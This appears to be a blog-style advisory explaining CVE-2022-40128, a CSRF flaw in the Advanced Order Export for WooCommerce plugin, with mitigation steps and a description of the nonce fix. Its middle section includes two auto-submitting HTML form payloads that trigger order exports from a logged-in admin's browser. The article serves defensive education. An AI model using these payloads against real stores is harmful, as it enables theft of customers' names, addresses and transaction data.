If you're running a WordPress store powered by WooCommerce, chances are you rely on plugins for every special feature. One popular tool, Advanced Order Export For WooCommerce, helps admins download detailed order reports. But in 2022, a major security warning was published: A Cross-Site Request Forgery (CSRF) flaw in plugin versions up to 3.3.2 (CVE-2022-40128) puts your sensitive store data at risk.
In this article, we’ll break down what this vulnerability means, how it can be abused, show you what the exploit looks like, and—most importantly—how to stay protected.
What Is CSRF and Why Should You Care?
CSRF (Cross-Site Request Forgery) is a type of attack where a bad website tricks your browser into making unwanted requests on another website where you’re logged in—like your WordPress dashboard.
If a vulnerable plugin doesn’t check if actions are coming from a legitimate source, an attacker could get you (or any admin) to trigger backend actions without knowing, just by visiting a malicious website or even by clicking a sneaky link in an email.
What the CVE-2022-40128 Vulnerability Does
With CVE-2022-40128, attackers discovered that Advanced Order Export For WooCommerce’s admin features lacked nonce checks for certain export actions. That means if you’re an admin and log in, visiting a malicious site could force your browser to generate and download sensitive export files—without your consent!
Sophisticated attackers even designed attacks to quietly send those files to their own server.
*Original reference*:
- WPScan Advisory
- NVD – CVE-2022-40128
How the Attack Works
Let's say you (as a shop administrator) are logged in and browsing. You open a rogue website in another browser tab (or click a bad link in an email). That page invisibly submits a form or loads a script pointing to your shop’s export endpoint.
Because the plugin has no CSRF protection, WordPress thinks YOU requested a sensitive data export.
This could look like
<!-- Malicious HTML - Admin only has to visit this page! -->
<form action="https://your-website.com/wp-admin/admin-ajax.php"; method="POST" id="stealOrder">
<input type="hidden" name="action" value="order_export" />
<input type="hidden" name="export_settings_id" value="1" />
<!-- Add any other required parameters -->
</form>
<script>
document.getElementById('stealOrder').submit();
</script>
Or, for a modern attacker, fetch the file via JavaScript and send it to their server.
Here's a concrete example. Imagine a malicious website with this HTML
<form action="https://store.example.com/wp-admin/admin-ajax.php"; method="POST" enctype="multipart/form-data" id="csrfForm" target="invisible">
<input type="hidden" name="action" value="order_export" />
<input type="hidden" name="export_settings_id" value="default" />
<input type="submit" value="Go!" />
</form>
<iframe name="invisible" style="display:none"></iframe>
<script>
document.getElementById('csrfForm').submit();
</script>
- If an authenticated WordPress admin visits this page, their browser unknowingly sends a valid export request.
Why Is This Bad?
Order exports can include names, shipping addresses, phone numbers, emails, and transaction details—pretty much everything a competitor or scammer needs. If a hacker gets these files, they can spam your customers, target them for fraud, or simply resell private information.
1. Update the Plugin
The plugin’s authors fixed this issue in version 3.3.3. You should immediately update to the latest version:
2. Check for Old Files
Review your /wp-content/uploads/ folder (and wherever exports go). Remove any suspicious or unnecessary exports, especially those created at odd times.
3. Use Security Plugins
Tools like Wordfence or Sucuri help spot unauthorized logins or plugin issues.
4. Limit User Capabilities
Make sure only trusted users have permission to export orders. Don’t share admin accounts.
5. Log Out When Not Needed
If you’re done with admin work, log out—especially before browsing unfamiliar sites.
How Was It Fixed?
The developers added nonce verification to the export endpoint. Now, any export request must include a secret token generated in the admin area. Random outsiders (or background scripts) can no longer abuse your login to trigger data exports.
Conclusion
CVE-2022-40128 was a wakeup call for store owners. Even a popular, well-maintained plugin can have dangerous flaws if endpoints lack simple protections like nonces. Always keep your plugins up-to-date, and understand what features could expose your data.
Stay safe, and if you want to dive deeper, check out the original advisories
- WPScan Advisory Page
- Official Plugin Changelog
*If this article helped you understand real-world plugin dangers, share it with other WordPress users or admins. Patch early, patch often!*
Timeline
Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 14:57:00 UTC